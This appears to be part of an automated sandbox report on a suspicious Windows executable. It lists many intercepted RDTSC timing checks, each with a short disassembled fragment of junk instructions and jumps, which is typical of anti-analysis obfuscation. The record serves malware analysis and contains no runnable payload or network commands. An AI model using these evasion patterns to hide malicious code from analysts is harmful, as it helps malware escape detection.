Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 1703062 second address: 1703068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 17031C3 second address: 17031C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 17032E6 second address: 1703307 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4464DAB8C6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F4464DAB8D2h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 1703307 second address: 1703325 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F4464F4BF1Eh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 1703325 second address: 1703343 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F4464DAB8D7h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 1703343 second address: 1703364 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push edi 0x0000000a pop edi 0x0000000b jp 00007F4464F4BF16h 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F4464F4BF1Dh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 1703A7D second address: 1703A8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edi 0x00000006 jmp 00007F4464DAB8CAh 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 170B9B6 second address: 170B9D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4464F4BF28h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 170BAFB second address: 170BB1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jmp 00007F4464DAB8D8h 0x0000000b pushad 0x0000000c popad 0x0000000d push esi 0x0000000e pop esi 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 170BB1E second address: 170BB25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 170C17B second address: 170C18B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jno 00007F4464DAB8C8h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 170C2D6 second address: 170C30B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F4464F4BF1Ch 0x0000000c push edi 0x0000000d push esi 0x0000000e pop esi 0x0000000f jmp 00007F4464F4BF24h 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 jns 00007F4464F4BF16h 0x0000001d push esi 0x0000001e pop esi 0x0000001f rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 170C30B second address: 170C311 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 170C47D second address: 170C481 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 170C481 second address: 170C491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4464DAB8CAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 170C491 second address: 170C4AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007F4464F4BF16h 0x00000015 jnp 00007F4464F4BF16h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 170D704 second address: 170D70A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 170D70A second address: 170D720 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F4464F4BF18h 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F4464F4BF16h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 170B473 second address: 170B489 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F4464DAB8D2h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 170B489 second address: 170B4A1 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4464F4BF18h 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007F4464F4BF16h 0x00000012 je 00007F4464F4BF16h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 170B4A1 second address: 170B4B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464DAB8CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 170B4B7 second address: 170B4CB instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4464F4BF16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e jnc 00007F4464F4BF16h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 1713691 second address: 17136CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 jmp 00007F4464DAB8D4h 0x0000000d jmp 00007F4464DAB8D7h 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 17136CC second address: 17136D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 17136D2 second address: 17136D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 1714DE1 second address: 1714DE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 17290D1 second address: 17290DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F4464DAB8C6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 1728C80 second address: 1728C8A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 172F922 second address: 172F92D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 1734489 second address: 1734493 instructions: 0x00000000 rdtsc 0x00000002 js 00007F4464F4BF22h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 1734493 second address: 17344C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F4464DAB8C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 jmp 00007F4464DAB8D8h 0x00000016 jp 00007F4464DAB8C6h 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 1735B71 second address: 1735B77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 1735B77 second address: 1735B7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 1735B7D second address: 1735B9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F4464F4BF24h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 1742C8D second address: 1742CAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F4464DAB8D9h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 1742CAC second address: 1742CB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 174312E second address: 1743132 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 1743455 second address: 1743459 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 1743459 second address: 17434A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464DAB8CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F4464DAB8D9h 0x0000000e push eax 0x0000000f push edx 0x00000010 jp 00007F4464DAB8C6h 0x00000016 jmp 00007F4464DAB8D9h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 17435ED second address: 17435F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 17435F3 second address: 17435F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 1748814 second address: 1748819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 1748819 second address: 174881F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 174881F second address: 1748823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 174897C second address: 1748980 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 178A43D second address: 178A45F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4464F4BF21h 0x00000009 js 00007F4464F4BF16h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 178A45F second address: 178A468 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 178A31F second address: 178A323 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 1784A27 second address: 1784A30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 1784A30 second address: 1784A37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 1865B05 second address: 1865B10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 1865B10 second address: 1865B1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F4464F4BF16h 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 186608E second address: 18660B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 jo 00007F4464DAB8C6h 0x0000000b pop edx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F4464DAB8D3h 0x00000015 push esi 0x00000016 pop esi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 18660B5 second address: 18660CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F4464F4BF21h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 18660CE second address: 18660D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F4464DAB8C6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 186621F second address: 186623D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464F4BF1Eh 0x00000007 jne 00007F4464F4BF16h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 186623D second address: 1866259 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F4464DAB8D0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 1866259 second address: 186625D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 186625D second address: 1866263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 1866263 second address: 1866289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4464F4BF27h 0x0000000b push ebx 0x0000000c jg 00007F4464F4BF16h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 1866289 second address: 1866291 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 1866291 second address: 1866297 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 1868041 second address: 1868045 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 1868045 second address: 1868070 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a push edx 0x0000000b ja 00007F4464F4BF16h 0x00000011 push eax 0x00000012 pop eax 0x00000013 pop edx 0x00000014 popad 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007F4464F4BF21h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 1868070 second address: 1868076 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 186AA0B second address: 186AA10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 186AA10 second address: 186AA1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F4464DAB8C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 186AD05 second address: 186AD09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 186C595 second address: 186C5BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464DAB8CAh 0x00000007 ja 00007F4464DAB8C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F4464DAB8CEh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 186C5BA second address: 186C5CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4464F4BF1Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 186C5CB second address: 186C5CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 186E75A second address: 186E778 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F4464F4BF29h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 186E778 second address: 186E799 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4464DAB8D1h 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 186E799 second address: 186E7B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464F4BF26h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 186E7B3 second address: 186E7B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 186E7B9 second address: 186E7C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F4464F4BF16h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7540008 second address: 754000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 754000C second address: 7540029 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464F4BF29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7540029 second address: 754005E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464DAB8D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F4464DAB8CEh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F4464DAB8CEh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 754005E second address: 75400B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4464F4BF21h 0x00000009 and al, FFFFFFC6h 0x0000000c jmp 00007F4464F4BF21h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F4464F4BF20h 0x00000018 or esi, 4F298368h 0x0000001e jmp 00007F4464F4BF1Bh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 xchg eax, ebp 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 75400B5 second address: 75400D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464DAB8D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 75400D0 second address: 7540121 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464F4BF29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F4464F4BF1Eh 0x00000010 mov eax, dword ptr fs:[00000030h] 0x00000016 pushad 0x00000017 jmp 00007F4464F4BF1Eh 0x0000001c mov esi, 40639C21h 0x00000021 popad 0x00000022 sub esp, 18h 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7540121 second address: 7540125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7540125 second address: 7540129 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7540129 second address: 754012F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 754012F second address: 754014A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4464F4BF27h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 754014A second address: 7540166 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4464DAB8D1h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7540166 second address: 7540186 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, E1h 0x00000005 push eax 0x00000006 pop edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F4464F4BF21h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7540186 second address: 75401B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4464DAB8D7h 0x00000008 mov eax, 1FFD7F8Fh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov ebx, dword ptr [eax+10h] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 75401B1 second address: 75401B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
